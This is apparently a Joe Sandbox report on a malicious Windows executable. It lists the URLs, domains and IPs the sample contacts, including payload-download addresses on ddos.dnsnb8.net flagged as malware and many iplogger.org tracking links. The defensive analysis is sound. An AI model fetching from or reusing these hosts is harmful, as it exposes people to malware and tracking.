https://iplogger.org/1LvRk7	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k3.rarXX	100%	Avira URL Cloud	malware
https://iplogger.org/1NsYz7	0%	Avira URL Cloud	safe
https://sa-us-bucket.s3.us-east-2.amazonaws.com/jhvre24	0%	Avira URL Cloud	safe
https://iplogger.org/12TMs7	0%	Avira URL Cloud	safe
https://iplogger.org/1Tkij7	0%	Avira URL Cloud	safe
https://iplogger.org/1pcji7	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rar(__	100%	Avira URL Cloud	phishing
https://iplogger.org/1GWfv7	0%	Avira URL Cloud	safe
https://iplogger.org/1b4887	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k5.rarP_	100%	Avira URL Cloud	phishing
https://iplogger.org/1rqRg7	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rarcC:	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	Avira URL Cloud	malware
http://www.spaceblue.com	0%	Avira URL Cloud	safe
https://iplogger.org/1pdxr7	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k5.rarq_	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k4.rarcC:	100%	Avira URL Cloud	phishing
https://iplogger.org/1J2q67	0%	Avira URL Cloud	safe
https://iplogger.org/1Jeq67	0%	Avira URL Cloud	safe
https://iplogger.org/1xvbz7	0%	Avira URL Cloud	safe
https://iplogger.org/1746b7	0%	Avira URL Cloud	safe
https://iplogger.org/1NpYz7	0%	Avira URL Cloud	safe
http://www.develop.comDeepak	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net/trol	100%	Avira URL Cloud	phishing
http://ngdatas.pw/https://www.icodeps.com/0.0.0.0%d.%d.%d.%dhttp-1ZIP	0%	Avira URL Cloud	safe
https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4Datam	0%	Avira URL Cloud	safe
http://www.mkpmc.com	0%	Avira URL Cloud	safe
http://ww12.icodeps.com/Certificates	0%	Avira URL Cloud	safe
https://iplogger.org/1rDMq785https://iplogger.org/1rd8N686https://iplogger.org/1spuy788https://iplog	0%	Avira URL Cloud	safe
https://iplogger.org/1uW6i7	0%	Avira URL Cloud	safe
https://iplogger.org/1uS4i7	0%	Avira URL Cloud	safe
https://iplogger.org/1s4qp7	0%	Avira URL Cloud	safe
https://iplogger.org/1Ghzj7	0%	Avira URL Cloud	safe
http://www.activestate.com	0%	Avira URL Cloud	safe
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
https://iplogger.org/1TW3i7	0%	Avira URL Cloud	safe
http://parking.parklogic.com/page/enhance.js?pcId=12&domain=icodeps.com	0%	Avira URL Cloud	safe
https://iplogger.org/1mxKf7	0%	Avira URL Cloud	safe
http://www.spaceblue.comMathias	0%	Avira URL Cloud	safe
http://www.mkpmc.com/Home/Index/getdata	0%	Avira URL Cloud	safe
https://iplogger.org/1vk2Q7	0%	Avira URL Cloud	safe
http://ww12.icodeps.com/	0%	Avira URL Cloud	safe
https://iplogger.org/1J9q67	0%	Avira URL Cloud	safe
https://iplogger.org/1NyYz7	0%	Avira URL Cloud	safe
https://iplogger.org/1ELna7	0%	Avira URL Cloud	safe
https://prntscr.com/upload.php	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k5.rarw	100%	Avira URL Cloud	malware
https://sm.ms/api/v2/upload?inajax=1	0%	Avira URL Cloud	safe
https://iplogger.org/14Jup7	0%	Avira URL Cloud	safe
https://www.google.com/search?q=admob&oq=admob	0%	Avira URL Cloud	safe
http://www.lua.org	0%	Avira URL Cloud	safe
https://iplogger.org/1Gczj7	0%	Avira URL Cloud	safe
http://ww12.icodeps.com/?usid=26&utid=7334446481	0%	Avira URL Cloud	safe
https://iplogger.org/1SWks7	0%	Avira URL Cloud	safe
https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net/	100%	Avira URL Cloud	phishing
https://iplogger.org/1YkFc7	0%	Avira URL Cloud	safe
http://ww12.icodeps.com//6	0%	Avira URL Cloud	safe
https://gady45.s3.amazonaws.com/sadjj6	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k3.rarcC:	100%	Avira URL Cloud	malware
https://iplogger.org/1vv2Q7	0%	Avira URL Cloud	safe
http://ww12.icodeps.com/osoft	0%	Avira URL Cloud	safe
https://iplogger.org/1CDGu7	0%	Avira URL Cloud	safe
https://jkcpt.s3.ap-south-1.amazonaws.com/dwqd5	0%	Avira URL Cloud	safe
https://iplogger.org/1756b7	0%	Avira URL Cloud	safe
http://ww99.icodeps.com/W7	0%	Avira URL Cloud	safe
https://iplogger.org/1Gjzj7	0%	Avira URL Cloud	safe
http://www.scintilla.org/scite.rng	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k3.rar8	100%	Avira URL Cloud	phishing
https://iplogger.org/1Gbzj7	0%	Avira URL Cloud	safe
https://iplogger.org/1spuy7	0%	Avira URL Cloud	safe
http://www.channelinfo.pw/index.php/Home/Index/getExe	0%	Avira URL Cloud	safe
http://ww99.icodeps.com/o7	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k4.rarffice	100%	Avira URL Cloud	phishing
https://iplogger.org/	0%	Avira URL Cloud	safe
https://iplogger.org/1XJq97	0%	Avira URL Cloud	safe
https://iplogger.org/1BBCf7	0%	Avira URL Cloud	safe
https://trkpcy.net/track.	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	Avira URL Cloud	malware
https://iplogger.org/143up7	0%	Avira URL Cloud	safe
https://www.smartsharesystems.com/	0%	Avira URL Cloud	safe
http://www.baanboard.comBrendon	0%	Avira URL Cloud	safe
http://www.scintilla.org	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarq_	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k5.rar8	100%	Avira URL Cloud	phishing
https://iplogger.org/1HWGc7	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
765534.parkingcrew.net	13.248.148.254	true	false	unknown
ddos.dnsnb8.net	44.221.84.105	true	false	unknown
ww99.icodeps.com	67.225.218.41	true	false	unknown
iplogger.org	172.67.132.113	true	false	unknown
www.icodeps.com	172.232.25.148	true	false	unknown
15.164.165.52.in-addr.arpa	unknown	unknown	true	unknown
ww12.icodeps.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar	false	Avira URL Cloud: phishing	unknown
https://sa-us-bucket.s3.us-east-2.amazonaws.com/jhvre24	true	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	false	Avira URL Cloud: malware	unknown
https://iplogger.org/1NpYz7	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k5.rar	false		unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k5.rar86)	MDSxhU.exe, 00000006.00000002.1753575155.000000000138E000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://iplogger.org/12QMs7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k4.rarUX	MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://iplogger.org/1E2ma7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1TBch7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://www.activestate.comHolger	SciTE.exe.6.dr	false		unknown
https://iplogger.org/1Cr3a7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1fHtp7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4https://jkcpt.s3.ap-south-1.amazonaws.com/dwqd5https	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1NsYz7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1Tkij7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rarXX	MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1pcji7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/12TMs7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1LvRk7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar(__	MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://iplogger.org/1GWfv7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1b4887	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1pdxr7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1rqRg7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://www.spaceblue.com	SciTE.exe.6.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k5.rarP_	MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarcC:	MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k4.rarcC:	MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k5.rarq_	MDSxhU.exe, 00000006.00000002.1753575155.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013FC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://iplogger.org/1J2q67	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1Jeq67	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://www.develop.comDeepak	SciTE.exe.6.dr	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1746b7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1xvbz7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net/trol	MDSxhU.exe, 00000006.00000003.1361370867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1361518674.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ngdatas.pw/https://www.icodeps.com/0.0.0.0%d.%d.%d.%dhttp-1ZIP	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://www.mkpmc.com	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4Datam	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.00000000010EE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ww12.icodeps.com/Certificates	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1rDMq785https://iplogger.org/1rd8N686https://iplogger.org/1spuy788https://iplog	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1s4qp7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1uS4i7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1uW6i7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://www.activestate.com	SciTE.exe.6.dr	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	URL Reputation: safe	unknown
https://iplogger.org/1Ghzj7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	MDSxhU.exe, 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmp, MDSxhU.exe, 00000006.00000003.1336230406.0000000001340000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1TW3i7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://parking.parklogic.com/page/enhance.js?pcId=12&domain=icodeps.com	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386045585.000000000119E000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1mxKf7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://www.mkpmc.com/Home/Index/getdata	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1vk2Q7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.6.dr	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1NyYz7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ww12.icodeps.com/	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1J9q67	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://prntscr.com/upload.php	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1ELna7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k5.rarw	MDSxhU.exe, 00000006.00000003.1487485666.0000000001422000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://sm.ms/api/v2/upload?inajax=1	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://www.google.com/search?q=admob&oq=admob	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/14Jup7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1SWks7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://www.lua.org	SciTE.exe.6.dr	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1Gczj7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ww12.icodeps.com/?usid=26&utid=7334446481	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net/	MDSxhU.exe, 00000006.00000003.1361370867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1361518674.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://gady45.s3.amazonaws.com/sadjj6	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ww12.icodeps.com//6	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1YkFc7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rarcC:	MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://iplogger.org/1CDGu7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1vv2Q7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://jkcpt.s3.ap-south-1.amazonaws.com/dwqd5	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ww12.icodeps.com/osoft	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rar8	MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://iplogger.org/1Gjzj7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1756b7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.6.dr	false	Avira URL Cloud: safe	unknown
http://ww99.icodeps.com/W7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.000000000115D000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1369347891.0000000001164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1Gbzj7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k4.rarffice	MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://iplogger.org/1spuy7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://ww99.icodeps.com/o7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1369347891.0000000001164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.channelinfo.pw/index.php/Home/Index/getExe	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001164000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://trkpcy.net/track.	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386131301.0000000001163000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1XJq97	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1BBCf7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
http://www.baanboard.comBrendon	SciTE.exe.6.dr	false	Avira URL Cloud: safe	unknown
https://iplogger.org/143up7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.6.dr	false	Avira URL Cloud: safe	unknown
http://www.scintilla.org	SciTE.exe.6.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarq_	MDSxhU.exe, 00000006.00000003.1361370867.0000000001404000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k5.rar8	MDSxhU.exe, 00000006.00000002.1753575155.000000000138E000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://iplogger.org/1HWGc7	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.132.113	iplogger.org	United States	13335	CLOUDFLARENETUS	false
13.248.148.254	765534.parkingcrew.net	United States	16509	AMAZON-02US	false
172.232.25.148	www.icodeps.com	United States	20940	AKAMAI-ASN1EU	false
44.221.84.105	ddos.dnsnb8.net	United States	14618	AMAZON-AESUS	false
67.225.218.41	ww99.icodeps.com	United States	32244	LIQUIDWEBUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1480317
Start date and time:	2024-07-24 17:31:54 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@10/23@6/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
